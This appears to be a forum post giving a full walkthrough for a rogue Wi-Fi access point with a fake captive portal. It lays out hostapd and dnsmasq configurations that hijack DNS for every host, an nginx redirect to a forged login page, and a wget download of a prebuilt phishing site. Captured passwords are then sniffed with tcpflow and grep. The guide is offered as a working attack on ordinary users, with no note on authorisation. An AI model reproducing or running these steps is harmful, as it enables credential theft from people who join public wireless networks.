    Setting up a wireless access point on linux is rather tricky than windows and android for we have to configure traffic forwarding and setup the network as well. Roguehostapd which is the newer and updated version of hostapd is not officially but developed by wifiphisher developers to be integrarted into their project. It also provides users with support of wifi karma attack.

  10. Sun Feb 9 21:09:03 2020
    Men in Black started the conversation Hack Wifi: Setup Your Fake Access Point.

    [attachment:5e4010cac002e]

    It often happens that when you connect to a WiFi network, you get a notification or a splash screen that tells you to do something in order to use the WiFi. Usually, you will see a login screen. That screen is called Captive Portal.

    So, what is it? Captive Portal is a small functional web document usually triggered through DNS spoofing & server redirection rules to trick the OS. If successful, the OS will trigger the Captive Portal Login Page.

    Let's see how we can setup a Captive Portal Login Page.

    So, how does a captive portal work? It works through DNS hijacking or Server redirection rules. Every OS has it's own way of detecting the captive portal in place. But mostly, the OS's looks for 302 redirection responses. Let's study each of their responses.

    Windows:

    Windows has it's obfuscated way of detecting captive portal. Usually, it would be one of two sites:

    www.msftconnecttest.com
    www.msftncsi.com

    Android:

    Android checks for returned response code. For example, if the returned response is 302, the OS will assume it to be the captive portal and trigger it. Usually, it be one of the following:

    clients3.google.com
    connectivitycheck.gstatic.com
    connectivitycheck.android.com

    Apple:

    Unlike Android & Windows, Apple when sends a request to the site, the site checks for a specific header that may clarify the nature of requested device. Apple requests for urls, usually:

    www.appleiphonecell.com
    captive.apple.com
    www.apple.com
    .apple.com.edgekey.net

    From iOS 7+, apple uses a specific User-Agent for Captive Portal requests: CaptiveNetworkSupport that can be used to trace Apple devices.

    Let's see how to setup the Captive Portal. We will be using hostapd for access point configuration, dnsmasq for DHCP server and nginx as our hosting web server and redirection rules.

    STEP 1

    Installation

    To acheive our objective, we will perform the step as a whole. Install nginx and other required tools and update your repositories:

    $ apt update
    $ apt install hostapd dnsmasq nginx

    Then put your wireless interface in monitor mode:

    $ airmon-ng start wlan1

    STEP 2

    Rogue Access Point

    We are about to use hostapd for hosting our Access Point. But this time, with a bit amendment, here's a link for hosting an access point with roguehostapd which infact would make the task more easier by replacing the actual configuration with a few arguments.

    Create and save the hostapd configuration for Access Point:

    $ nano /tmp/hostapd.conf
    interface=wlan1mon
    driver=nl80211
    ssid=[Fake AP Name] 
    hw_mode=g
    channel=[Fake AP Channel]
    macaddr_acl=0
    ignore_broadcast_ssid=0

    Start hostapd service:

    $ hostapd /tmp/hostapd.conf

    [attachment:5e4011a901a8e]

    STEP 3

    DHCP Server

    Now, we need a DHCP server to setup a small network provide the connecting users with ip addresses. We will use dnsmasq for the purpose. Create and save a new configuration file for dnsmasq:

    $ nano /tmp/dnsmasq.conf
    interface=wlan1mon
    address=/#/192.168.1.1
    dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
    dhcp-option=3,192.168.1.1
    dhcp-option=6,192.168.1.1
    server=8.8.8.8
    log-queries
    log-dhcp
    listen-address=127.0.0.1

    Up here in the configuration we used a field address. What it does is redirect all the ip addresses and hosts to a single ip as provided and in our case it is the gateway address where our forged website will reside:

    address=/#/192.168.1.1

    Just in case you want to redirect only a few sites, you will have to explicitly define each site individually followed by slash and the site to be followed. This way is used when you are willing to provide internet access to the users. For example:

    address=/facebook.com/192.168.1.1
    address=/google.com/192.168.1.1
    address=/youtube.com/192.168.1.1

    But we don't want it here for we want to give maximum redirects. It's because we don't know a user is going to request which site. So, why don't redirect all?

    Start dnsmasq service:

    $ dnsmasq -C /tmp/dnsmasq.conf -d

    [attachment:5e401195ea1a8]

    Finally, execute these two commands to assign gateway ip and netmask to your interface:

    $ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
    $ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

    STEP 4

    Captive Portal

    Here starts the actual work. Create a new directory to place your website and move to that directory. I would name it captive_portal.

    $ mkdir /var/www/captive_portal
    $ cd /var/www/captive_portal

    Now, download the Rogue AP website and extract the files under this directory:

    $ wget https://www.shellvoide.com/media/files/rogueap.zip
    $ unzip rogueap.zip -d ./

    Now, you would have files placed under your captive_portal directory. All we need now is to setup nginx configuration for our captive portal project. First, remove enabled sites from nginx configuration directory:

    $ rm /etc/nginx/sites-enabled/*

    Now, create a new configuration file for your captive portal project and place the following directives and then save the file:

    $ nano /etc/nginx/sites-enabled/captive_portal
    server{
        listen 80;
        root /var/www/captive_portal;        
    
        location / {
            if (!-f $request_filename){
                return 302 $scheme://192.168.1.1/index.html;
            }
        }
    }

    What is happening behind in the nginx configuration is whenever a file which doesn't exist is requested by the user, the request will be redirected to our fake page i.e. 192.168.1.1 which is exactly what we are trying to accomplish. You should note that this is the most important part where the non-existent files are being redirected. The directive root specifies the directory where the website is placed. Finally, reload the nginx service:

    $ service nginx reload
    $ service nginx restart

    Check if nginx is correctly serving our fake page:

    $ service nginx status

    [attachment:5e4012138b679]

    STEP 5

    Capture Password

    Since, we have our servicable access point along with a forged document, we need a way to capture the password credentials. Previously, we used MySQL database to store the data. However, there's even a better approach. Let's do sniffing and capture what is posted in the network. Open a terminal and execute this command:

    $ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

    What is happening is we are capturing the whole network traffic on every interface and then piping it to grep which will look for specific lines. I've set this up according to what will be POSTed when a user will enter password and press Enter on Captive Portal Login page. It will print data on screen when entered on the forged website:

    STEP 6

    Internet Forwarding (Optional)

    The last step is to provide our users with internet facility. However to acheive it would be a bit controversial. What we need to do is change or uncomment the address field in dnsmasq configuration. But if we do then Captive Portal will no longer work. So, what to do?

    To overcome this complication, i.e. to provide internet as well as Captive Portal should also be served, the address field is to be explicitly defined for a set of given sites. For example, to only redirect android based operating systems, the address field would be:

    address=/clients3.google.com/192.168.1.1

    The same could be applied to other websites as well. There are multiple sites which are to be correctly redirected for this. I don't know all of them but some of those famous and widely implemented sites can be configured:

    interface=wlan1mon
    dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
    dhcp-option=3,192.168.1.1
    dhcp-option=6,192.168.1.1
    server=8.8.8.8
    log-queries
    log-dhcp
    listen-address=127.0.0.1
    
    address=/clients3.google.com/192.168.1.1
    address=/gsp1.apple.com/192.168.1.1
    address=/.akamaitechnologies.com/192.168.1.1
    address=/www.appleiphonecell.com/192.168.1.1
    address=/www.airport.us/192.168.1.1
    address=/.apple.com.edgekey.net/192.168.1.1
    address=/.akamaiedge.net/192.168.1.1
    address=/.akamaitechnologies.com/192.168.1.1
    address=/captive.apple.com/192.168.1.1
    address=/ipv6.msftncsi.com/192.168.1.1
    address=/www.msftncsi.com/192.168.1.1

    Then restart dnsmasq with this configuration.

    Finally, we need another interface which have internet connection and the traffic from this interface will be forwarded to the access point interface. I've my this interface named wlan0 from where i will redirect traffic to wlan1mon. Execute the following commands with your respective interfaces:

    $ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    $ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

    Now, just one step to go...

    $ echo 1 > /proc/sys/net/ipv4/ip_forward

    It's all setup. Pick up your mobile, connect to the Rogue Access Point and see for yourself. If you enter password in the fields and press enter, the captured data will be printed in tcpflow terminal:

    [attachment:5e40127485d7c]

    Conclusion

    The conclusion that can be drawn from all of the above is users can easily be tricked into performing some unexpected tasks when it comes to wifi. With the help of captive portal login the overall performance and interactivity of the Access Point increases and the attack becomes more surfaced. Above all, the working of captive portal is merely placed upon the principle of redirection.

View more